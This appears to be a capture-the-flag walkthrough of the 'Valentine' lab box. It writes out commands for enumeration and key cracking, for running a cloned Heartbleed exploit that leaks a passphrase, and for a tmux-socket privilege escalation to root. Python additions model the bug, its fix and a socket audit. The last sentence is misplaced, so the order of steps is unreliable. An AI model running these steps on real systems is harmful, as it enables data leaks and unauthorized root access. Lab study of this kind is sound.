
Valentine

Abusing SSL HeartBleed vulnerability - SSH Trouble Shooting - SUID Socket PrivEsc via tmux


Last updated 1 year ago

Scanning

HTTP Enumeration

Viewing the page source didn't give me anything, nor did the robots.txt file.

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 10.10.10.79

Viewing /dev gives two important files; the encode and decode endpoints are just scripts run by the backend. Tried command injection there, but nothing worked :(

The hype_key is a hex-encoded string.

Change the key's permissions and try logging in via SSH:

chmod 400 hype_key
ssh -i hype_key hype@valentine.htb
hype_key's passphrase:

So now we need to figure out the passphrase; for this we can use the ssh2john utility!

ssh2john hype_key > out
john out --wordlist=/opt/rockyou.txt
. . . . .

Nothing useful, john couldn't crack it - BACK TO ENUMERATION :(

nmap --script vuln -oA vuln-scan 10.10.10.79

The vuln scan flags Heartbleed. It is essentially a vulnerability in the popular OpenSSL cryptographic software library. This vulnerability allows anyone on the Internet to read the memory of systems protected by a vulnerable version of OpenSSL. This can lead to the compromise of secret keys, passwords, other information, etc. It also allows attackers to eavesdrop on communications.

In order to exploit this we can use this script:

git clone https://gist.github.com/10174134.git

Let’s run the exploit with a loop number of 10

python heartbleed.py -p 443 -n 10 10.10.10.79

We get a base64-encoded string; when we decode it, we have the passphrase!

echo "aGVhcn.........." | base64 -d
heartbleedbeleievethehype 
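To show what the exploit above is actually abusing, here is an added Python model (not part of the original writeup, and not OpenSSL's own code) of a TLS heartbeat handler before and after the fix. The message layout follows RFC 6520 (type, 16-bit payload length, payload, 16 bytes of padding); the "adjacent memory" contents are a constructed placeholder.

```python
import struct
from typing import Optional

HEARTBEAT_REQUEST = 1
HEARTBEAT_RESPONSE = 2
PADDING_LEN = 16  # RFC 6520: at least 16 bytes of random padding


def build_heartbeat(payload: bytes, claimed_len: Optional[int] = None) -> bytes:
    """Build a heartbeat request; claimed_len lets a constructed message lie about its size."""
    length = len(payload) if claimed_len is None else claimed_len
    return struct.pack("!BH", HEARTBEAT_REQUEST, length) + payload + b"\x00" * PADDING_LEN


def respond_vulnerable(record: bytes, adjacent_memory: bytes) -> bytes:
    """Pre-fix behaviour: trust the length field and copy that many bytes from the
    payload start, running past the end of the record into whatever sits next to it."""
    _, claimed = struct.unpack("!BH", record[:3])
    buffer = record + adjacent_memory  # the record lives in a buffer beside other heap data
    payload = buffer[3:3 + claimed]
    return struct.pack("!BH", HEARTBEAT_RESPONSE, claimed) + payload + b"\x00" * PADDING_LEN


def respond_fixed(record: bytes, adjacent_memory: bytes) -> Optional[bytes]:
    """Patched behaviour: the claimed length must fit inside the record together with
    the header and minimum padding; otherwise the message is silently discarded."""
    if len(record) < 3 + PADDING_LEN:
        return None
    _, claimed = struct.unpack("!BH", record[:3])
    if 3 + claimed + PADDING_LEN > len(record):
        return None  # bounds check that the original code lacked
    payload = record[3:3 + claimed]
    return struct.pack("!BH", HEARTBEAT_RESPONSE, claimed) + payload + b"\x00" * PADDING_LEN


if __name__ == "__main__":
    secret = b"passphrase=EXAMPLE-PLACEHOLDER"  # constructed stand-in for nearby heap data
    lying = build_heartbeat(b"hi", claimed_len=40)
    print("vulnerable leaks secret:", secret[:10] in respond_vulnerable(lying, secret))
    print("fixed drops message:", respond_fixed(lying, secret) is None)
```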

We can now log on to the box using ssh

ssh -i hype_key hype@10.10.10.79
Enter passphrase for key 'hype_key':
sign_and_send_pubkey: no mutual signature supported

I encountered this error and spent some time fixing it; the fix is to explicitly re-enable the ssh-rsa key type:

ssh -o PubkeyAcceptedKeyTypes=+ssh-rsa -i hype_key hype@10.10.10.79

Privilege Escalation

Checked .bash_history because it wasn't linked to /dev/null:

ls -la /
cd .devs
ls -l dev_sess
tmux -S /.devs/dev_sess
exit

The file dev_sess was a socket file and it had the SUID bit set. When we attach to the session through that socket via tmux, we become root!
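From the defender's side, the thing to look for is a root-owned tmux (or any) Unix socket that other users can write to. The following Python audit is an added example, not part of the original writeup; the .devs/dev_sess layout it builds in a temp dir is constructed to mirror the box, and because a test cannot create root-owned files the demo treats the current user as the privileged owner.

```python
import os
import socket
import stat
import tempfile
from typing import List, Optional, Tuple


def find_exposed_sockets(root_dir: str, owner_uid: int = 0) -> List[Tuple[str, str]]:
    """Walk root_dir and return (path, mode) for Unix sockets owned by owner_uid that are
    writable by group or others. A tmux server socket (tmux -S path) that another user can
    write to lets that user attach to the owner's session with the owner's privileges."""
    findings = []
    for dirpath, _, filenames in os.walk(root_dir):  # hidden dirs such as .devs are included
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if not stat.S_ISSOCK(st.st_mode) or st.st_uid != owner_uid:
                continue
            if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
                findings.append((path, stat.filemode(st.st_mode)))
    return sorted(findings)


def demo(owner_uid: Optional[int] = None) -> List[Tuple[str, str]]:
    """Constructed layout: a world-writable .devs/dev_sess socket (the bad case) next to a
    socket locked to its owner (the good case). Returns what the audit flags."""
    base = tempfile.mkdtemp()
    os.mkdir(os.path.join(base, ".devs"))
    exposed = os.path.join(base, ".devs", "dev_sess")
    private = os.path.join(base, "private_sock")
    socks = []
    for path, mode in ((exposed, 0o777), (private, 0o700)):
        s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        s.bind(path)  # creates the socket file on disk
        os.chmod(path, mode)
        socks.append(s)
    uid = os.getuid() if owner_uid is None else owner_uid
    return find_exposed_sockets(base, uid)


if __name__ == "__main__":
    for path, mode in demo():
        print(f"exposed socket: {mode} {path}")
```

On a real host you would run find_exposed_sockets("/") as root (or whatever user can traverse the tree) with the default owner_uid=0.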

Let’s use an online tool to convert it to text - We find out that it is an RSA private key!